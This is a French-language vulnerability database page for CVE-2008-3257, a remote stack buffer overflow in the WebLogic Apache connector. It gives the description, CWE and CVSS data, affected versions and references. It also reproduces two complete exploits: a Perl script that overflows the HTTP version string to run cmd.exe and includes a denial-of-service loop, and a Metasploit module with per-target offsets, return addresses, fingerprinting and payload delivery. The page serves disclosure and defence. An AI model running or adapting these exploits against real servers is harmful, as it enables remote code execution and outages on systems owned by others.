CVE-2008-3257 : Détail

CVE-2008-3257

Overflow
93.7%V3
Network
2008-07-22
14h00 +00:00
2017-09-28
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 6089

Date de publication : 2008-07-16 22h00 +00:00
Auteur : kingcope
EDB Vérifié : Yes

#// Bea Weblogic -- Apache Connector Remote Exploit +-1day #// Should stack break latest Windows Server 2003 <address space randomization> #// BIG THANKS TO #// "dong-hun you"(Xpl017Elz) in INetCop - for his paper #// "Title: Advanced exploitation in exec-shield (Fedora Core case study)" #// His technique works fine against Windows 2003 latest version. #// #// The code is broken, since I am chilling out for now #// SKIDDI BULLETPROOF #// You may fixup the DoS Code, Windows Code Works on English OSs #// KingCope -- July/2008 use IO::Socket; use strict; $|=1; my $apacheport = 80; #// Touch ### my $wrongusage = 0; my $dodoshost = 0; ############################################################################### ### Target List Entries |Operating System and Patch Level / Kernel Version| ############################################################################### my @targets = (); my @tgtname = (); print "-" x 80; $targets[0] = "1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\n"; $tgtname[0] = $targets[0]; $targets[100] = "2 Denial of Service\n"; $tgtname[100] = $targets[100]; ############################################################################### ### Print Of Target List And Usage ############################################################################### print "\n"; print "Bea Weblogic -- Apache Connector Remote Exploit\n\n"; print "Target List:\n"; foreach my $target (@targets) { print $target; } print "\n\n"; print "-" x 80; print "Usage: perl bea-unlock.pl <hostname or ip> <target>"; print "\n"; printusage: if ($wrongusage == 1) { exit; } ################################################################################ ### Argument Parsing ################################################################################ my $host = $ARGV[0]; my $target = $ARGV[1]; if (($host == "") || ($target == "")) { $wrongusage = 1; goto printusage; } ################################################################################ ### Setup Socket ################################################################################ setupsocket: my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $apacheport, Proto => 'tcp'); if ($dodoshost == 1) { goto doshost; } ################################################################################ ### Select Target ################################################################################ if ($target == 1) { print "Exploiting $host -- " . $tgtname[$target-1]; goto winexpl; } if ($target == 2) { print "Attacking Host $host -- Denial of Service -- Wait ...\n"; goto doshost; } ################################################################################ ### Exploitation of Windows Versions ################################################################################ winexpl: ####WORKS [LOOKUP THE HOSTNAME] my $command = "echo works > c:\\desiredfile.txt"; my $cmds = "cmd.exe /c \"$command\"|"; my $sc = $cmds; #### STACKBREAKING WITH WINEXEC() ON WINDOWS my $c = "C" x 97 . pack("L", 0x10013930) x 3 . pack("L", 0x10013930) . pack("L", 0x10013931) . pack("L",0x77EA411E); my $a = $cmds . "A" x (4000-length($cmds)) . $c; print $sock "POST /.jsp $a\r\nHost: localhost\r\n\r\n"; while (<$sock>) { print; } ################################################################################ ### Denial of Service Against The Apache Frontend Module For Bea Weblogic ################################################################################ ####NEEDS SOME FIXUP doshost: $dodoshost = 1; while(1) { $a = "A" x 6000; goto setupsocket; print $sock "POST /.jsp $a\r\n\r\nHost: localhost\r\n\r\n"; while(read($sock,$_,100)) { my $dosagain = 0; if ($dosagain eq 1) { "Server is down now\n"; exit; } if ($_ =~ /Server/) { print "."; $dosagain = 1; next; } } } # milw0rm.com [2008-07-17]
Exploit Database EDB-ID : 18897

Date de publication : 2012-05-18 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. The connector fails to properly handle specially crafted HTTP POST requests, resulting a buffer overflow due to the insecure usage of sprintf. Currently, this module works over Windows systems without DEP, and has been tested with Windows 2000 / XP. In addition, the Weblogic Apache plugin version is fingerprinted with a POST request containing a specially crafted Transfer-Encoding header. }, 'Author' => [ 'KingCope', # Vulnerability Discovery and PoC 'juan vazquez', # Metasploit Module ], 'Version' => '$Revision: $', 'References' => [ [ 'CVE', '2008-3257' ], [ 'OSVDB', '47096' ], [ 'BID', '30273' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Privileged' => true, 'Platform' => 'win', 'Payload' => { 'Space' => 4000, 'BadChars' => "\x00\x0d\x0a\x3f" }, 'Targets' => [ [ 'Automatic', {} ], [ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]', { 'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so 'Offset' => 4102 } ], [ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]', { 'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so 'Offset' => 4102 } ], [ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]', { 'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so 'Offset' => 4102 } ] ], 'DisclosureDate' => 'Jul 17 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']), ], self.class) end def check fingerprint = fingerprint_mod_wl case fingerprint when /Version found/ return Exploit::CheckCode::Vulnerable when /BEA WebLogic connector vulnerable/ return Exploit::CheckCode::Appears when /BEA WebLogic connector undefined/ return Exploit::CheckCode::Detected when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/ return Exploit::CheckCode::Safe end end def exploit # Autodetect BEA mod_wl version my_target = get_target # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("BEA mod_weblogic not supported") return end uri = target_uri.path sploit = rand_text_alphanumeric(my_target['Offset']-uri.length) sploit << [my_target.ret].pack("V") sploit << payload.encoded send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri} #{sploit}", }) handler end def get_target return target if target.name != 'Automatic' fingerprint = fingerprint_mod_wl case fingerprint when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/ return targets[1] when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/ return targets[2] when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/ return targets[3] else return nil end end def fingerprint_mod_wl my_data = rand_text_alpha(rand(5) + 8) res = send_request_cgi( { 'method' => 'POST', 'uri' => target_uri.path, 'headers' => { 'Transfer-Encoding' => my_data }, 'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n", }) if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/ # BEA WebLogic 8.1 SP6 - mod_wl_20.so case res.body when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/) return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so" # BEA WebLogic 8.1 SP5 - mod_wl_20.so when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/) return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so" when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/) return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so" # Check for dates prior to patch release when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/ build_date = Date.parse($1) if build_date <= Date.parse("Jul 28 2008") return "BEA WebLogic connector vulnerable" else return "BEA WebLogic connector no vulnerable" end else return "BEA WebLogic connector undefined" end end return "BEA WebLogic connector not found" end end

Products Mentioned

Configuraton 0

Bea>>Weblogic_server >> Version 3.1.8

Bea>>Weblogic_server >> Version 4.0

Bea>>Weblogic_server >> Version 4.0.4

Bea>>Weblogic_server >> Version 4.5

Bea>>Weblogic_server >> Version 4.5.1

Bea>>Weblogic_server >> Version 4.5.1

Bea>>Weblogic_server >> Version 4.5.2

Bea>>Weblogic_server >> Version 4.5.2

Bea>>Weblogic_server >> Version 4.5.2

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 5.1

Bea>>Weblogic_server >> Version 6.0

Bea>>Weblogic_server >> Version 6.0

    Bea>>Weblogic_server >> Version 6.0

      Bea>>Weblogic_server >> Version 6.0

        Bea>>Weblogic_server >> Version 6.1

        Bea>>Weblogic_server >> Version 6.1

        Bea>>Weblogic_server >> Version 6.1

        Bea>>Weblogic_server >> Version 6.1

        Bea>>Weblogic_server >> Version 6.1

        Bea>>Weblogic_server >> Version 6.1

        Bea>>Weblogic_server >> Version 6.1

        Bea>>Weblogic_server >> Version 6.1

        Bea>>Weblogic_server >> Version 6.1

        Bea>>Weblogic_server >> Version 7.0

        Bea>>Weblogic_server >> Version 7.0

        Bea>>Weblogic_server >> Version 7.0

        Bea>>Weblogic_server >> Version 7.0

        Bea>>Weblogic_server >> Version 7.0

        Bea>>Weblogic_server >> Version 7.0

        Bea>>Weblogic_server >> Version 7.0

        Bea>>Weblogic_server >> Version 7.0

        Bea>>Weblogic_server >> Version 7.0.0.1

        Bea>>Weblogic_server >> Version 7.0.0.1

        Bea>>Weblogic_server >> Version 7.0.0.1

        Bea>>Weblogic_server >> Version 7.0.0.1

        Bea>>Weblogic_server >> Version 7.0.0.1

        Bea>>Weblogic_server >> Version 8.1

        Bea>>Weblogic_server >> Version 8.1

        Bea>>Weblogic_server >> Version 8.1

        Bea>>Weblogic_server >> Version 8.1

        Bea>>Weblogic_server >> Version 8.1

        Bea>>Weblogic_server >> Version 8.1

        Bea>>Weblogic_server >> Version 8.1

        Bea>>Weblogic_server >> Version 9.0

        Bea>>Weblogic_server >> Version 9.0

          Bea>>Weblogic_server >> Version 9.0

            Bea>>Weblogic_server >> Version 9.0

              Bea>>Weblogic_server >> Version 9.0

                Bea>>Weblogic_server >> Version 9.0

                  Bea>>Weblogic_server >> Version 9.0

                    Bea>>Weblogic_server >> Version 9.1

                    Bea>>Weblogic_server >> Version 9.1

                    Bea>>Weblogic_server >> Version 9.2

                    Bea>>Weblogic_server >> Version 9.2

                    Bea>>Weblogic_server >> Version 9.2

                    Bea>>Weblogic_server >> Version 10.0

                    Bea_systems>>Apache_connector_in_weblogic_server >> Version *

                      Bea_systems>>Weblogic_server >> Version 10.0_mp1

                        Oracle>>Weblogic_server >> Version To (including) 10.3

                        Références

                        https://www.exploit-db.com/exploits/6089
                        Tags : exploit, x_refsource_EXPLOIT-DB
                        http://secunia.com/advisories/31146
                        Tags : third-party-advisory, x_refsource_SECUNIA
                        http://www.securityfocus.com/bid/30273
                        Tags : vdb-entry, x_refsource_BID
                        http://www.securitytracker.com/id?1020520
                        Tags : vdb-entry, x_refsource_SECTRACK
                        http://www.kb.cert.org/vuls/id/716387
                        Tags : third-party-advisory, x_refsource_CERT-VN